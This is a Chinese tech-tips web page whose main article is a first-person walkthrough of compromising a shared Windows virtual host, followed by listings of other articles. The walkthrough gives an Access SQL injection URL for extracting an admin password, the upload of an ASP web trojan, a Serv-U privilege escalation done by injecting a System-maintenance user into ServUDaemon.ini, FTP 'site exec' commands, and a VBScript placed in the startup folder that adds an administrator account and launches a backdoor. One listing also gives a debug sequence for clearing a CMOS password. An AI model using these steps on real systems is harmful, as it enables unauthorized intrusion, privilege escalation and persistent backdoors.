虚拟主机怎么被黑客入侵?黑客入侵虚拟主机的步骤
前几天听一树说了惊云下载系统的漏洞
问题文件出在admin/user.asp
提交
http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1
就相当于:
select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’" 利用access注入得到管理员密码
上面有一个文件upfile.htm
手工利用了下动网的upfile.asp漏洞
就成功上传了个asp木马
然后那个虚拟主机的c,d盘是NTFS分区
不能访问E盘装着servu,php,webmail,
F盘是虚拟站点
servu安装目录可写~
本来打算替换他servu文件的~但是觉的太麻烦
还容易让管理员怀疑
想起servu的本地提升来了 在自己计算机上装了个servu
添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里看ServUDaemon.ini
格式是这样的
[GLOBAL]
Version=5.0.0.11
LocalSetupPassword=072C63105200180D5C07170A7E3E
LocalSetupPortNo=60628
ProcessID=972
[DOMAINS]
Domain1=192.168.0.102||21|向导产生域|1|0|0
Domain2=192.168.0.102||2121|123|2|0|0
[Domain1]
User1=www|1|0
[USER=www|1]
Password=ih0C292E1AC82920B7F384007F302A1296
HomeDir=D:\xiaoben
TimeOut=600
Note1="Wizard generated account"
Access1=D:\xiaoben|RLPWAMCD
SKEYValues=
[Domain2]
User1=rover|1|0
User2=123|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
[USER=123|2]
Password=kv3F6EED70340AD1478ADF95963A07FD00
HomeDir=c:\
TimeOut=600
Access1=C:\|RWAMLCDP
SKEYValues=
----------------
其中rover用户就是我添加的那个
在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini
访照我本地的INI写进一个用户进去
User1=rover|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
保存~ 用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //输入构造的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。
提示没有权限~郁闷~
但是我们有对C盘的访问权限了是不~hoho~
把后门(server.exe)传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators tsinternetuser /add",0)
b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0)
b=wshshell.run ("cmd.exe /c server.exe",0) 存为HELP.vbe
这个教本的作用是修改tsinternetuser用户密码为rover1234
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本~
接下来就是等了~
等他登陆~
等了一段时间(看了一部蜘蛛侠的时间吧)~
连接后门~得到admin权限的shell
hoho~
接下来是善后工作了~就不说了
今天心情非常糟~有一些事情压的我喘不过气来
考试的时候当老师面把卷子撕了,然后扬步走了~
妈妈的~过程写的很乱~见谅
傲游浏览器有哪些漏洞?傲游浏览器的漏洞一般在哪些地方?
这个漏洞首先是国外某个团队发现的,他研究了多个浏览器的漏洞。其中遨游的漏洞比较独特,大致存在几个方面的,1 about:history中存在xss漏洞,即浏览历史中url链接中存在明显的xss漏洞。2 遨游的拓展中存在大量
详情2018-01-08 17:11:48责编:llp 来源:驱动管家cmos的密码怎么破解?cmos破解密码的方法
1 简单的DOS下DEBUG破解程序:用软盘启动进入DOS下,执行Debug程序(你没有,那得去拷贝一个啊)1)debugo 70 2e (回车)o 71 00 (回车)o 70 2f (回车)o 71 00 (回车)然后重新启动,就一进入C
详情2018-01-08 15:03:45责编:llp 来源:驱动管家不让外来人员共享文件要怎么做?禁止外人共享文件的方法
为了日常工作方便,设置共享文件服务器通常是大多数企业的管理方式,共享文件服务器上的共享文件仅用于局域网内的用户使用。但工作中免不了有客户来访,也需要连接网络,这样公司内部共享的文件也会向这些外来人
详情2018-01-06 18:07:13责编:llp 来源:驱动管家关闭flash cookie避免信息泄露要怎么做?
Flash Cookie比浏览器Cookie容量更大,可以跨浏览器对不同Cookies进行身份剔重,但是不易删除。让我们一起来看看如何关闭Flash Cookie吧:1 用户打开一个新的浏览器窗口,在浏览器中输入如下网址:http: www ma
详情2018-01-05 09:26:37责编:llp 来源:驱动管家手机使用技巧 智能手机怎么用?
1。用智能手机工作室1 1版备份联系人、短信、通话记录等, 下载刷机相关文件(刷机工具, ROM, Radio, 格式化ExtROM工具Repart_DOC exe), 同步软件ActiveSync要用最新版4 0以上的。2。确认下载的ROM文件(n
详情2018-01-04 11:50:01责编:llp 来源:驱动管家什么是ip欺骗?ip欺骗的原理
即使是很好的实现了TCP IP协议,由于它本身有着一些不安全的地方,从而可以对TCP IP网络进行攻击。这些攻击包括序列号欺骗,路由攻击,源地址欺骗和授权欺骗。本文除了介绍IP欺骗攻击方法外,还介绍怎样防止这个
详情2018-01-06 18:36:30责编:llp 来源:驱动管家杀毒软件有哪些误区?杀毒软件的九大误区
杀毒软件几乎是每台电脑的必须品,随着电脑技术的日益提高,几乎每个用电脑的人都遇到过计算机病毒,因此杀毒软件也是比不可少的。但是,对病毒和杀毒软件的认识许多人还存在着误区。杀毒软件虽然可以帮助电脑拦
详情2018-01-08 11:32:15责编:llp 来源:驱动管家u盘病毒的分析 u盘病毒的应对策略
分析: U盘对病毒的传播要借助autorun inf文件的帮助,病毒首先把自身复制到u盘,然后创建一个autorun inf,在你双击u盘时,会根据autorun inf中的设置去运行u盘中的病毒,我们只要可以阻止autorun inf文件的创建
详情2018-01-06 14:21:52责编:llp 来源:驱动管家怎么使用野草weedcmsV5.2.1删除文件漏洞?
member php if($action==
详情2018-01-09 17:58:26责编:llp 来源:驱动管家arp病毒怎么查找?如何查杀arp病毒?
一、首先诊断是否为ARP病毒攻击1、当发现上网明显变慢,或者突然掉线时,我们可以用arp-命令来检查ARP表:(点击“开始”按钮-选择“运行”-输入“cmd”点击 "确定 "按钮,在窗口中输入“arp-a”命令)如果发现网关
详情2018-01-09 10:09:00责编:llp 来源:驱动管家
- win7电脑连接打印机后提示“未能成功安装设备驱动程序” 要怎么解决?
- 手机支付宝钱包的声波取票功能是什么?手机支付宝钱包怎么取票?
- 逼死强迫症的微信头像加1是怎么搞出来的?
- 买了佳能复印机发现不会使用怎么办
- 华硕k55v的相关性能配置怎么样
- windows7激活密钥最可靠的方法有哪些
- iphone开不了机的原因分析和解决方法总结
- 有的网页会自动打开摄像头怎么办?禁止网页打开摄像头的方法
- 微软ie浏览器的脚本错误导致破坏漏洞出现
- 设备管理器中找不到dvd驱动器 怎么恢复?
- 使用sai绘图时内存占用率过高怎么办?这个问题怎么解决?
- 支付宝存款利息高不高?支付宝存款怎么算利息?
- cpu散热风扇在安装的过程中要注意以下的问题
- 关于mifa f7户外音箱评测结果分析
- 使用ps来进行ico图标制作的方法详解
- 价格相差700元的魅蓝metal和魅族mx5的区别
- U盘启动怎么做 91u盘启动助手制作U盘启动教程
- 短信验证码诈骗 警惕短信木马程序窃取信息
- 联想手写板驱动在哪里下载?怎么按照型号来选择对应的驱动
- 新浪微博客户端怎么更改手机号?微博客户端登陆手机号更换方法